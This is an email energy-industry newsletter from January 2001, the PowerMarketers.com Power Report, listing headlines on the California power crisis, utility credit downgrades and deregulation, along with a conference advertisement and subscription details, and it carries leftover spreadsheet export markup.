Are the newspapers getting the real behind-the-scenes story on the energy _x000D_
crisis in California? Do you need to get in-depth analyses from the players _x000D_
shaping headlines like these below, and a forecast of where things might go _x000D_
in the future? Attend Power Crunch in the West with Xenergy's Executive _x000D_
Forum: Restructuring the California Market and Infocast's Status &amp; Outlook _x000D_
for Western Wholesale and Retail Markets scheduled for February 12-14, 2001 _x000D_
at the Holiday Inn on the Bay in San Diego, CA to get the insights _x000D_
surrounding the following headlines._x000D_
_x000D_
Get a serious understanding of the latest developments in California and _x000D_
throughout the West that you just can't read about in the newspapers from the _x000D_
key people directly tackling these issues. Get up-to-the-minute briefings _x000D_
from:_x000D_
_x000D_
- Senator Deborah Bowen, Chairperson for the California State Senate Energy, _x000D_
Utilities, and Communications Committee_x000D_
- Loretta Lynch, President of the California Public Utilities Commission_x000D_
- William Keese, Chairman of the California Energy Commission_x000D_
- Stephen L. Baum, CEO of Sempra Energy Corporation_x000D_
- Curtis L. H,bert, FERC Commissioner_x000D_
_x000D_
As well as representatives from key market players including:_x000D_
- Utilities: Sempra Energy, PG &amp; E, Southern California Edison, Arizona _x000D_
Public Service_x000D_
- Power Suppliers: Duke Energy, Reliant Energy, Calpine_x000D_
- User Groups: California Manufacturer's Association, TURN, UCAN_x000D_
- Market Operators: California Power Exchange, California ISO, Automated _x000D_
Power Exchange_x000D_
- Northwest Planning Council and more..._x000D_
_x000D_
EARLY BIRD SPECIAL:  There is still time to take advantage of the Early Bird _x000D_
tuition of only $995 for the "Status &amp; Outlook for Western Wholesale and _x000D_
Retail Markets" and $595 for the "Executive Forum: Restructuring the _x000D_
California Market". This Early Bird offer is available through Friday, _x000D_
January 19, 2001._x000D_
_x000D_
For a full description of the program, download the brochure at:_x000D_
_x000D_
http://www.pmaconference.com/crunch.pdf_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
--------------------T O P S T O R I E S--------------------_x000D_
_x000D_
Top Stories (January 18)_x000D_
_x000D_
CALIFORNIA ISO: STATEWIDE BLACKOUTS UNLIKELY WEDNESDAY NIGHT_x000D_
The California Independent System Operator does not intend to order statewide _x000D_
rolling blackouts this evening thanks to additional supply it received from _x000D_
Canada and the Los Angeles Department of Water and Power, a spokesman with _x000D_
the grid operator said._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
01/18/eng-djn/eng-djn_010157_72_0021734666079_x000D_
_x000D_
US DOE EXTENDS CALIFORNIA POWER EMERGENCY ORDER THROUGH JANUARY 23_x000D_
The U.S. Department of Energy extended through Jan. 23 an emergency order _x000D_
requiring power producers to supply California's fractured electricity market._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
01/18/eng-djn/eng-djn_112043_170_107703162357_x000D_
_x000D_
PROSPECTIVE US ENERGY CHIEF FACES DAUNTING PROBLEMS_x000D_
Former Sen. Spencer Abraham, President-elect Bush's choice as energy _x000D_
secretary, fully expects to hear a litany of woes at his Senate confirmation _x000D_
hearing._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
01/18/eng-djn/eng-djn_112044_218_380677059758_x000D_
_x000D_
ENERGY CRISIS WORSENS FOR WASHINGTON STATE AS POWER-SHARE ARRANGEMENT ENDS_x000D_
Anyone still harboring hope the power-sapped Northwest will get help from the _x000D_
south this winter had their hopes dashed against the California shoreline _x000D_
Friday._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/01/18/krtbn/0000-0548-PK-ENERGY-CRISIS_x000D_
_x000D_
INCREASE IN POWER-GENERATING CAPACITY HELPS NEW ENGLAND ELECTRIC DEREGULATION_x000D_
In New England, electric deregulation has turned out to be a moderate _x000D_
disappointment -- but nowhere near as bad as the $11 billion debacle in _x000D_
California._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/01/18/krtbn/0000-0333-GL-POWER_x000D_
_x000D_
VIRGINIA LAWMAKERS ADDRESS POSSIBILITY OF ELECTRIC DEREGULATION_x000D_
A flurry of concerns from lawmakers about proposed amendments to Virginia's _x000D_
1999 electric utility deregulation law chilled any possibility that a _x000D_
subcommittee overseeing deregulation might endorse any proposals yesterday._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/01/18/krtbn/0000-0583-RV-UTILITY_x000D_
_x000D_
SOUTHERN ENERGY INC. PROVIDES FULL REQUIREMENTS SERVICE TO NIAGARA MOHAWK _x000D_
POWER CORPORATION_x000D_
Southern Energy Inc. today announced it has entered into a long-term _x000D_
agreement with Niagara Mohawk Power Corp. (NIMO) to serve as the exclusive _x000D_
agent for NIMO's upstream, natural-gas supply resources._x000D_
http://199.97.97.163/IMDS%PMANAT0%read%/home/content/users/imds/feeds/comtex/2_x000D_
001/01/18/pr/0000-2302-ga-southern-energy_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
DOW JONES NEWSWIRES_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: _x000D_
http://199.97.97.79/IMDS|PMADJN0,PMADJN1,PMADJN2,PMADJN3,PMADJN4|index_x000D_
_x000D_
DOE/Calif Pwr -2: Enforcement Actions Threatened_x000D_
_x000D_
EPA Orders Reducation In Arsenic In Drinking Water_x000D_
_x000D_
Sales Into CalPX Fall To 13% Of Load On Credit Concerns_x000D_
_x000D_
FPL, Coastal Pwr Building 535-MW Plant in Central Texas_x000D_
_x000D_
REPEAT&amp;CORRECT: S&amp;P Downgrades Edison Mission Energy Rtgs_x000D_
_x000D_
FERC Sets Staff Conference On Calif Pwr Market Monitoring_x000D_
_x000D_
PRESS RELEASE: Calif Utils Bankruptcy Chances Up :Moody's_x000D_
_x000D_
Calif Crisis Boosts Utils Bankruptcy Probability:Moody's_x000D_
_x000D_
WRAP: Whitman -2: Lawmakers Cite EPA's Energy Policy Role_x000D_
_x000D_
PRESS RELEASE:S&amp;P Downgrades Edison Mission Energy Rtgs_x000D_
_x000D_
EEI:US Electric Output For Wk Ended Jan 13 Up 8% On Year_x000D_
_x000D_
Cal-ISO/Blackouts -4: Outages In S Calif Undetermined_x000D_
_x000D_
Telecom Italia's Entel Chile Wins Venezuela WLL License_x000D_
_x000D_
Cal-ISO/Blackouts-3: Outages May Last Through Wed Night_x000D_
_x000D_
PRESS RELEASE: Moody's Cuts Projs Tied To Calif Utilities_x000D_
_x000D_
CORRECT: 5 Projects Exposed To Calif Utilities Downgraded_x000D_
_x000D_
Cal-ISO Orders Rolling Blackouts Wed, 500 MW In North_x000D_
_x000D_
Cal-ISO/Blackouts-2: Outages To Affect 500,000 Cust_x000D_
_x000D_
PRESS RELEASE: S&amp;P Cuts Calif ISO Corp Issuer Credit Rtg_x000D_
_x000D_
Cal-ISO Says Blackouts May Be Called For North Calif Only_x000D_
_x000D_
Calif. Utility Bondholders Pin Hopes On Reorganization_x000D_
_x000D_
WRAP: Whitman Vows To Transform US Environment Protection_x000D_
_x000D_
Bush Team Says Calif Power Crisis Up To State To Solve_x000D_
_x000D_
US Eastern Power Forwards Flat On Lower Natl Gas Prices_x000D_
_x000D_
N.Y. Board Approves 800-MW Power Plant by Sithe, GE_x000D_
_x000D_
PRESS RELEASE:S&amp;P Cuts Edison Mission Energy To BBB- &gt;EME_x000D_
_x000D_
PRESS RELEASE: S&amp;P Cuts Calif Power Exch Short-Term Rtg_x000D_
_x000D_
DOE Plans 2nd-Biggest US Wind Power Farm In Nevada_x000D_
_x000D_
Calpine Unit To Build 800-MW Cogen Plant in Augusta, Ga_x000D_
_x000D_
Edison Mission Energy Sr Sec Cut To BBB- By S&amp;P_x000D_
_x000D_
Calif Power Exchange Corp Short-Term Credit Cut To C:S&amp;P_x000D_
_x000D_
Calif Emergency Pwr Bill Won't Clear State Senate Soon_x000D_
_x000D_
California ISO Corp Issuer Credit Rtg Cut To CC By S&amp;P_x000D_
_x000D_
5 Projects Exposed To Calif Utilities Downgraded:Moody's_x000D_
_x000D_
LG&amp;E May Leave MW ISO Grid Oper If Other Cos Allowed Out_x000D_
_x000D_
Innogy To Sell Station To Independent Power UK For GBP42M_x000D_
_x000D_
Brazil's CSN Gains BRR270 Mln With Sale Of Stake In Light_x000D_
_x000D_
PRESS RELEASE: S&amp;P Cuts Southern California Edison Rtgs_x000D_
_x000D_
PRESS RELEASE: Edison Funding Sr Debt Cut To CC By Fitch_x000D_
_x000D_
Edison Intl Corp Credit, CP, Sr Unsec Debt Cut By S&amp;P_x000D_
_x000D_
Southern California Edison Sr Sec Cut To CC Vs BBB-:S&amp;P_x000D_
_x000D_
Edison Funding Sr Debt Cut To CC From CCC By Fitch_x000D_
_x000D_
Amer Pacific/Bill Dispute -2: Seeks Utah Power Compliance_x000D_
_x000D_
Amer Pacific Seeks To Recover Disputed Charges &gt;APFC_x000D_
_x000D_
S&amp;P Lowers Ratings On Southern California Edison_x000D_
_x000D_
Amer Pacific May Report 1Q Op Loss If Funds Not Recovered_x000D_
_x000D_
Amer Pacific Claims Utah Power Breached Contract &gt;APFC_x000D_
_x000D_
PRESS RELEASE: Pacific Gas &amp; Elec, PG&amp;E Corp Cut: Moody's_x000D_
_x000D_
Pacific Gas &amp; Elec, PG&amp;E Corp. Downgraded By Moody's_x000D_
_x000D_
Pacific Gas &amp; Elec Sr Unsec Cut To Caa2 Vs Baa3: Moody's_x000D_
_x000D_
PG&amp;E Corp. Issuer Rtg Cut To Caa3 From Baa3: Moody's&gt;PCG_x000D_
_x000D_
PRESS RELEASE: Edison Funding Sr Unsec Cut To B2: Moody's_x000D_
_x000D_
Edison Funding Sr Unsec Cut To B2 From Baa3 By Moody's_x000D_
_x000D_
Cogentrix Plans Up To 1,600-MW Of New Power In W. VA._x000D_
_x000D_
Natl Grid/Niagara Mohawk Filing -2: Seek Approval By June 1_x000D_
_x000D_
Natl Grid,Niagara See Move Cutting Elec Price Hike_x000D_
_x000D_
Natl Grid,Niagara Mohawk Propose $132M Delivery Rate Cut_x000D_
_x000D_
PG&amp;E Corp Says 8-K Filing Delayed, Still Being Drafted_x000D_
_x000D_
Calif Sen/Energy Bill-3:Calif Would Sell Pwr To Utilities_x000D_
_x000D_
CalPX: FERC Amends Tariff; SoCal Ed Given 2-Day Deferral_x000D_
_x000D_
FREE TRIAL: For a free trial of the Dow Jones Energy Service go to_x000D_
www.dowjonesnews.com, and click "create account," or call_x000D_
1-800-223-2274._x000D_
_x000D_
----------------------------------------------------------------------_x000D_
N A T I O N A L_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://www.powermarketers.com/pma-nat.htm_x000D_
_x000D_
Silicon Valley Cos. Talk Power Woes_x000D_
_x000D_
Trends in the Region: Even Without Deregulation, Northwest Suffers From Power _x000D_
Ills_x000D_
_x000D_
Advisory/Energy Producers Power Update_x000D_
_x000D_
Ocean Energy to Acquire Texoil_x000D_
_x000D_
Bush Team Quiet on Power Crisis_x000D_
_x000D_
Pacific Gas And Electric Company of California Files SEC Form 8k_x000D_
_x000D_
Tacoma Power Works on Plan to Borrow Money to Buy Electricity Tacoma: Even _x000D_
with Surcharge, Utility Will Spend Its Cash Reserve by Spring, Officials Say_x000D_
_x000D_
Reliant Energy Continues to Work with California Leadership to Solve Energy _x000D_
Crisis_x000D_
_x000D_
Rolling Electricity Blackouts May Impact Natural Gas Appliances_x000D_
_x000D_
Natural Gas Supply Issue Reaches Crisis Level; Suppliers Have Said They May _x000D_
Pull Up to Two-Thirds of Needed Gas Due to California Energy Crisis_x000D_
_x000D_
Seventh Energy Ltd. Releases 2001 Operating And Financial Forecasts_x000D_
_x000D_
Enhance California Utility Bonds Exposure_x000D_
_x000D_
Richardson Warns Power Producers_x000D_
_x000D_
PG&amp;E National Energy Group Names Karl W. Miller Senior Vice President, _x000D_
Marketing And Business Development_x000D_
_x000D_
Southern Energy Inc. Provides Full Requirements Service to Niagara Mohawk _x000D_
Power Corp._x000D_
_x000D_
Pace Global Energy Services to Provide Power Management And to Secure And _x000D_
Structure Power Development Funding for Adair_x000D_
_x000D_
Green Mountain Energy Company Aims to Bring Cost-Effective Cleaner And _x000D_
Renewable Electricity to Ohio_x000D_
_x000D_
Department of Energy Office of Fossil Energy; Chinook Pipeline Company (The _x000D_
Successor to Xeno, Inc.), ET Al.; Orders_x000D_
Granting And Transferring Authority to Import And Export Natural Gas_x000D_
_x000D_
Utility Passes Electricity Rate Hike_x000D_
_x000D_
Duke Energy Continues to Provide Solutions for California's Energy Crisis_x000D_
_x000D_
S&amp;P Rates PG&amp;E National Energy Group 'Bbb'_x000D_
_x000D_
Blackouts to Ease California Power Crisis_x000D_
_x000D_
Sji Issues Retraction to Marina Energy, Llc Release_x000D_
_x000D_
Energy Companies Rolling in Cash Engage in New Round of Consolidation_x000D_
_x000D_
Fitch Rts Constellation Energy Group $400mm Fltg-Rate Notes `a-/F2'_x000D_
_x000D_
Abraham Recants Call to Abolish Energy Department_x000D_
_x000D_
Stuart Energy Receives Order for Ttr Hydrogen Generator_x000D_
_x000D_
Wind-to-Energy Farm to Be Developed at Nevada Test Site_x000D_
_x000D_
Top Energy Summaries - Thursday, January 18, 2001 - 2:34 PM_x000D_
_x000D_
Senator blames deregulation for energy shortage_x000D_
_x000D_
Repeats: Energy Volume And Open Interest Totals-Jan 18_x000D_
_x000D_
Feature/California Style Deregulation: the Problem, the Solution And The _x000D_
Silver Lining; by Craig G. Goodman, A Former High Ranking Energy Policy _x000D_
Official in The Reagan &amp; Bush Administrations_x000D_
_x000D_
Dwr Begins Implementing Governor's Order; Expanding Its Role in Electrical _x000D_
Purchase And Sales_x000D_
_x000D_
Structure Consulting Group And Tibco Software Assist Ontario Power Generation _x000D_
with Energy Trading Application Integration_x000D_
_x000D_
Statement by the President on Establishing New Energy Efficiency Standards _x000D_
for Appliances_x000D_
_x000D_
Energy Update/Los Angeles Department of Water And Power Issues Daily Energy _x000D_
Update for Thursday, Jan. 18, 2001_x000D_
_x000D_
Dpl Announces Phase Five of Generation Expansion; Regional Merchant _x000D_
Generation Additions Top 1,000 Megawatts_x000D_
_x000D_
Strong Record for Energy Production on Federal Lands During Clinton _x000D_
Administration_x000D_
_x000D_
Advance Energy Delivers Dynamic E-Customer Services Using Latest Peace _x000D_
Software TechnologyNew Internet Self-Service And E-Commerce Options for _x000D_
Advance Energy Customers_x000D_
_x000D_
Top Energy Summaries - Thursday, January 18, 2001 - 12:30 PM_x000D_
_x000D_
Davis Puts Calif Into Power Market_x000D_
_x000D_
It's Time to Face Power Facts_x000D_
_x000D_
Businesses Cope with Power Shut-Offs_x000D_
_x000D_
No Longer Just a Threat; Large Areas Feel Power Pinch_x000D_
_x000D_
Sanyo NIMH Cells to Power Ford Hybrid Electric Vehicle_x000D_
_x000D_
Fitch Cuts Pacific Gas And Electric Ratings_x000D_
_x000D_
Senator Urges Delay In N.M. Power Deregulation_x000D_
_x000D_
Idacorp, Inc. And Idaho Power Company Declare Dividends_x000D_
_x000D_
Cass Information Systems to Acquire Web-Enabled Utility Payment Division from _x000D_
Insite Services, Inc._x000D_
_x000D_
Southwest Power Pool Teams with Accenture to Create Systems Infrastructure to _x000D_
Meet Federal Energy Regulatory Commission_x000D_
RequirementsFerc Order 2000 Requires Southwest Power Pool to Have _x000D_
Infrastructure in Place to Operate As Regional_x000D_
Transmission Organization by December 2001_x000D_
_x000D_
Bxl Energy Ltd. Announces Normal Course Issuer Bid_x000D_
_x000D_
Belair Energy Corporation Announces Corporate Update_x000D_
_x000D_
No Customer Outages at This Time, But Strong Possibility; State Remains under _x000D_
Stage Three Electrical Emergency for Third Consecutive Day_x000D_
_x000D_
Officials Grappling with High Cost of Natural Gas_x000D_
_x000D_
Energy Nominee to Face Problems_x000D_
_x000D_
Teco Energy Declares Quarterly Dividend_x000D_
_x000D_
N.H. Electric Deregulation Plan Upheld Norma Love, The Associated Press_x000D_
_x000D_
Maxim Power Announces Investment in Waste Energy Technology_x000D_
_x000D_
Electricity Denial: Utility Credit Crunch Is State-Inflicted_x000D_
_x000D_
Top Energy Summaries - Thursday, January 18, 2001 - 9:22 Am_x000D_
_x000D_
Allegheny Technologies Announces Natural Gas Surcharges at Allvac And _x000D_
Allegheny Ludlum_x000D_
_x000D_
Deloitte Consulting And Pantellos Form Strategic RelationshipConsulting Firm _x000D_
to Support Independent Marketplace for The Utility And Energy Services _x000D_
Industries_x000D_
_x000D_
3tec Energy Corporation Reports Capital Budget And Estimates for 2001 And _x000D_
Announces Meeting with Equity Research Analysts_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
I N T E R N A T I O N A L_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://www.powermarketers.com/pma-intr.htm_x000D_
_x000D_
Canadians in California Cheer B.C. Utility Supplying Power to State_x000D_
_x000D_
Californian immigrants puzzled, frustrated by energy crisis_x000D_
_x000D_
Russia's Rostov Nuclear Power Plant to Be Launched Feb 15._x000D_
_x000D_
Kenya Power Firm Pushes for Tariff Reduction_x000D_
_x000D_
EU commission ready to involve Poland in energy supply strategy with Russia_x000D_
_x000D_
Enron And Pilkington Announce Long-Term Energy Management Agreement_x000D_
_x000D_
Marconi Sells Optical-Transmission System to Korea Electric Power Company_x000D_
_x000D_
Nepal, India to increase power exchange_x000D_
_x000D_
Distributors Protest Costs Increase from Power Exports - Argentina_x000D_
_x000D_
APB Energy Acquires Stake in Norwegian Energy Brokers_x000D_
_x000D_
Power Markets: Wind Farm Deal Struck_x000D_
_x000D_
Tuas Power to raise 525 mln sgd via medium-term note issue_x000D_
_x000D_
Singapore Power to revise electricity tariffs effective Feb 1_x000D_
_x000D_
China's Electricity Generation Up by 9.7 Pct in 2000_x000D_
_x000D_
Korea Electric Power to Complete Break Up by April_x000D_
_x000D_
Gas to Be Used More in Electricity Generation_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
KRT DAILY ENERGY NEWS_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at http://www.powermarketers.com/pma-krt.htm_x000D_
_x000D_
Energy, Environment Firmly Linked in Bush's First Issue: Fuel_x000D_
_x000D_
Wind Power Potential in Oklahoma Studied_x000D_
_x000D_
Consumers on Washington's Gig Harbor, Key Peninsulas to See Higher Power Rates_x000D_
_x000D_
Illinois-Based Nicor Gas Offers 12-Month Budget Payment Plan for Utility Bills_x000D_
_x000D_
California Legislators Seek Solutions to Utility Crisis_x000D_
_x000D_
California Utility Will Not Pay Debts, Says Bankruptcy Is Possible_x000D_
_x000D_
California Assembly Approves Bill to Sell Electricity to Two Utilities_x000D_
_x000D_
California Manufacturers Cope with Rolling Blackouts_x000D_
_x000D_
Power Firm to Improve Electrical System in South Bend, Ind._x000D_
_x000D_
Soaring Utility Bills Leave California Seniors Reeling_x000D_
_x000D_
California's Energy Crisis Deepens; Bankruptcy Looms for Two Utilities_x000D_
_x000D_
Virginia Lawmakers Address Possibility of Electric Deregulation_x000D_
_x000D_
Richmond, VA., Residents Hit Snag Trying to Call Natural Gas Utility_x000D_
_x000D_
Raleigh, N.C.-Area Natural Gas Prices May Have Peaked_x000D_
_x000D_
Portland, Ore.-Based Power Authority Exports Electricity to California_x000D_
_x000D_
Kennewick, Wash., Residents Brace for Big Utility Rate Hikes_x000D_
_x000D_
Energy Crisis Worsens for Washington State As Power-Share Arrangement Ends_x000D_
_x000D_
New Jersey Lawmakers in Both Parties Seek Hearings on Electricity Deregulation_x000D_
_x000D_
Use of Solar Energy Helps Illinois Families Reduce Heating Bills_x000D_
_x000D_
Colorado, Kansas Water Dispute Is Likely Headed to Court_x000D_
_x000D_
Energy Aid Bill Gets Approval from Colorado House_x000D_
_x000D_
Duke Energy Gives Final Consideration to Calvert City, KY., Power Plant_x000D_
_x000D_
Kentucky Gas Company Responds to Customer Service Problems_x000D_
_x000D_
Orlando, Fla., Water Utility to Increase Rates for Biggest Residential Users_x000D_
_x000D_
Washington, Oregon to Benefit from Wind-Driven Power Plant_x000D_
_x000D_
Cash-Strapped Southern California Edison Can't Pay Power Exchange_x000D_
_x000D_
California Assembly Approves Power-Buying Plan_x000D_
_x000D_
California State Government's Role in Energy Crisis Tested_x000D_
_x000D_
Southern California Edison Defaults on Debt Payments_x000D_
_x000D_
California Power Crisis Triggers Some Finger-Pointing_x000D_
_x000D_
Houston-Based Energy Company Beats Wall Street Earnings Expectations_x000D_
_x000D_
Increase in Power-Generating Capacity Helps New England Electric Deregulation_x000D_
_x000D_
The Boston Globe Boston Capital Column_x000D_
_x000D_
Oregon Power Bills to Rise As Rate Increase Takes Hold_x000D_
_x000D_
California Governor's Tough New Stand May Halt Power Rate Increases_x000D_
_x000D_
Escondido, Calif., Not Releasing Power Plant Bid Numbers_x000D_
_x000D_
Energy Crisis Affects Pacific Northwest's Snake River Dam Proposal_x000D_
_x000D_
Customers of Colorado Utility Pay Highest Natural Gas Prices in Region_x000D_
_x000D_
Golden, Colo., Warms to Idea of Aid for Utility Bills_x000D_
_x000D_
Michigan Deregulation Has Been Smooth -- So Far_x000D_
_x000D_
Cracked Pipe Raises Concerns Well Beyond South Carolina Nuclear Power Plant_x000D_
_x000D_
California Utility Defaults; Duke Energy, Bank of America May Take Hit_x000D_
_x000D_
Emeryville, Calif.-Based Utility Cot-Com Ceases Operation_x000D_
_x000D_
California Power Crisis Deepens As Wall Street Revokes Credit_x000D_
_x000D_
Hardware Rides to Rescue of Martinez, Calif., Ace Store's Energy Bills_x000D_
_x000D_
California Legislators Debate State Involvement in Energy Crisis_x000D_
_x000D_
Californians Fear Impact of Electricity Crisis on State Economy_x000D_
_x000D_
Amarillo Globe-News, Texas, Energy Briefs Column_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
REUTERS_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://207.32.82.57/news/ElectricPower.html_x000D_
_x000D_
FERC official says power deregulation must go ahead_x000D_
_x000D_
US Fed cannot solve Calif. power crisis-Fed's Poole_x000D_
_x000D_
UPDATE 1-Energy Secy nominee says monitoring Calif power crisis_x000D_
_x000D_
U.S. utilities to report rosy fourth quarter-analysts_x000D_
_x000D_
Natgas cutbacks to continue in San Diego -SDG&amp;E_x000D_
_x000D_
UPDATE 3-Duke'searnings rise on strong natgas prices_x000D_
_x000D_
UPDATE 2-Powergen launches single billing, ad campaign_x000D_
_x000D_
Blackout threat looms again in Calif. power crisis_x000D_
_x000D_
S&amp;P comments on Northwest's public power companies_x000D_
_x000D_
UPDATE 1-N. Korea's Kim visits Shanghai bourse, car plant_x000D_
_x000D_
Low reservoirs add to Western U.S. power woes_x000D_
_x000D_
Enron, Pilkington sign $500 mln energy management deal_x000D_
_x000D_
UPDATE 1- CalPX to liquidate SoCal Edison forward contracts_x000D_
_x000D_
Barclays says position on California unchanged_x000D_
_x000D_
UPDATE 2-El Salvador fights disease, quake trauma_x000D_
_x000D_
California inspires Cominco to explore more energy sales_x000D_
_x000D_
World Bank approves $180 mln India loan_x000D_
_x000D_
Moody's cuts Salton Sea Funding, CE Generation rtgs_x000D_
_x000D_
Moody's:Calif rating outlook stable despite crisis_x000D_
_x000D_
Calif. utilities' cost-cutting stirs consumer alarm_x000D_
_x000D_
UPDATE 1-Con Edison earnings slip, sees better year ahead_x000D_
_x000D_
UK power buyers seek action on contract deadlock_x000D_
_x000D_
Energy Secty nominee says monitoring Calif power crisis_x000D_
_x000D_
UPDATE 1-PG&amp;E warns could lose 36 pct of gas suppply by Jan 23_x000D_
_x000D_
Moodys cuts Edison Mission Energy snr debt rtgs_x000D_
_x000D_
Kashmir rebels threaten attacks over power cuts_x000D_
_x000D_
Canada natgas plummets with cheaper U.S. physicals_x000D_
_x000D_
FTC urged to review competition in electric industry_x000D_
_x000D_
PG&amp;E warns could lose 36 pct of gas supply by Jan 23_x000D_
_x000D_
Clinton admin. sets appliance energy efficiency rules_x000D_
_x000D_
UPDATE 1-Bond insurers to pay Calif debt claims_x000D_
_x000D_
Lights dim on Calif. electric deregulation experiment_x000D_
_x000D_
Star Gas reports jump in Q1 earnings_x000D_
_x000D_
S&amp;P cuts some Edison Int'l, SoCal Edison rtgs to D_x000D_
_x000D_
UPDATE 1-Richardson warns suppliers on Calif power crisis_x000D_
_x000D_
Moody's reports on U.S. electric cooperatives' credit_x000D_
_x000D_
Colombian government appeals order to pay $58 million_x000D_
_x000D_
Calif senator--Power crisis threatens world economy_x000D_
_x000D_
Venezuelan infrastructure minister resigns_x000D_
_x000D_
Duke's earnings rise on strong natgas prices_x000D_
_x000D_
UPDATE 1-Gov. declares California emergency over power_x000D_
_x000D_
UPDATE 1-B.C. not worried by power sales to California_x000D_
_x000D_
*********************************************************_x000D_
NEW on the POWERMARKETERS.COM TRAINING PAGE_x000D_
*********************************************************_x000D_
Access all online presentations at: http://www.pmaconference.com_x000D_
_x000D_
New! Now you can choose to stream the presentation immediately over the web, _x000D_
or download it to your computer for later viewing-- Free!_x000D_
_x000D_
New! Five additional RealVideo-based powerpoint-based presentations, with the _x000D_
accompanying audio. Running about 30 minutes each, the new selections include:_x000D_
_x000D_
ELECTRONIC TRADING. Power is following natural gas to become an _x000D_
electronically-traded commodity. The products, the technology and the future _x000D_
of electricity transactions. Kevin Sluder, Vice President, HoustonStreet _x000D_
Exchange._x000D_
_x000D_
NUTS AND BOLTS OF RETAILING. What it takes to put an energy retailing _x000D_
operation together-- the cash and credit requirements, back office, _x000D_
information technology, staffing, marketing, sales and organizational _x000D_
considerations. Andrew Serri, Vice President, AmerenEnergy Marketing._x000D_
_x000D_
RETAIL: WHAT WENT WRONG, HOW TO FIX IT. Retail electric deregulation has thus _x000D_
far been an underwhelming success, but a great deal has been learned, and it _x000D_
is eminently fixable. By Dr. John O'Brien, Principal, Skipping Stone_x000D_
_x000D_
MANAGING BILLING. The complex requirements for managing billing and _x000D_
commodities in the deregulating energy industry cannot be met with current _x000D_
CIS and CRM technology. Energy Retailers must embrace the next evolution of _x000D_
energy customer management (ECM) solutions. Paul Grey, Chief Technology _x000D_
Officer, Peace Software._x000D_
_x000D_
THE INTERNET AND THE VELOCITY FACTOR. Greater price transparency, faster _x000D_
execution, reduced transaction costs, increased number and frequency of _x000D_
transactions and increased specialization are just some of the changes to _x000D_
energy markets wrought by the web, and it's just beginning. Implecations of _x000D_
the internet for energy markets. E. Russell "Rusty" Braziel, Chairman and _x000D_
Director, Altra Energy Technologies._x000D_
_x000D_
Access all online presentations at: http://www.pmaconference.com_x000D_
_x000D_
****************************************_x000D_
THE PowerMarketers.com ENERGYYELLOWPAGES_x000D_
****************************************_x000D_
http://www.energyyellowpages.net_x000D_
_x000D_
Where to go when you're looking for:_x000D_
Billing Systems, Brokers, Call Centers, Coal Marketers, Computers &amp;_x000D_
Networks, Conference Houses, Energy Management, Engineering Services,_x000D_
Environmental Services, Exchanges &amp; Clearing Houses, Executive Search_x000D_
Services, Financial Services, Gas Marketers, Information Services, Internet_x000D_
Services, Legal Services, Management Consulting , Marketing, Meters, Power_x000D_
Marketers, Powerplant Development, Powerplant Equipment, Risk Management,_x000D_
Sales, Software, Trade Associations, Training, Weather Services and more!_x000D_
Check it out today! http://www.energyyellowpages.net/_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
OTHER NEWS &amp; INFORMATION FEATURES ON POWERMARKETERS.COM_x000D_
----------------------------------------------------------------------_x000D_
_x000D_
PRICEWATERHOUSECOOPERS NEXT-DAY POWERTRAX ELECTRIC PRICE INDEX:_x000D_
Access online at: http://www.powermarketers.com/p-trax.htm_x000D_
_x000D_
ELECTRICITY SPOT PRICES:_x000D_
Access online at: http://www2.dtnergy.com/pma/btu.plx_x000D_
_x000D_
ELECTRICITY FUTURES PRICES:_x000D_
Access online at: http://www.dtn.com/dtnonline/dtnergy/pma/pma.quotes.cfm_x000D_
_x000D_
NATURAL GAS FUTURES PRICES:_x000D_
Access online at: http://www.dtn.com/dtnonline/dtnergy/pma/pma.gas.quotes.cfm_x000D_
_x000D_
THE PowerMarketers.com JobSite:_x000D_
Access online at: http://www.powermarketers.com/pmajobs.htm_x000D_
A daily visit to "The PMA Jobs Site" at _x000D_
http://www.powermarketers.com/pmajobs.htm connects you to a wealth of power _x000D_
industry opportunities that could supercharge your career!_x000D_
PMA ONLINE MAGAZINE: Access online at: http://www.retailenergy.com/pmamag.htm_x000D_
_x000D_
News releases may be submitted to The PowerMarketers.com Power Report via _x000D_
e-mail to news@powermarketers.com_x000D_
_x000D_
Copyright 2000 by PowerMarketers.com: http://www.powermarketers.com/_x000D_
_x000D_
The PowerMarketers.com Power Report is a complimentary service of The Power _x000D_
Marketing Association. Headlines are copyrighted by their respective _x000D_
services: Reuters, Knight-Ridder, and others._x000D_
_x000D_
Subscriptions to the PowerMarketers.com Power Report are free - you will _x000D_
never be charged. You may redistribute this e-mail without change. You may _x000D_
not redistribute stories. To register for a free subscription, point your _x000D_
browser to: http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
TO UNSUBSCRIBE OR CHANGE your subscription, (1) point your browser to "The _x000D_
PMA OnLine Power Report" subscription services form at _x000D_
http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
_x000D_
OR_x000D_
_x000D_
(2) , send a message to pma@powermarketers.com. Include "unsubscribe" in the _x000D_
subject and include your name and email address for confirmation.</t>
  </si>
  <si>
    <t>Thu, 20 Dec 2001 10:05:44 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fnamjou@energy.state.ca.us'})</t>
  </si>
  <si>
    <t>[NEWSRELEASES-LIST] Morro Bay Power Plant - Energy Commission_x000D_
 Releases Second Partof Morro Bay Power Plant Staff Analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
------------------------------------------------------------------------_x000D_
_x000D_
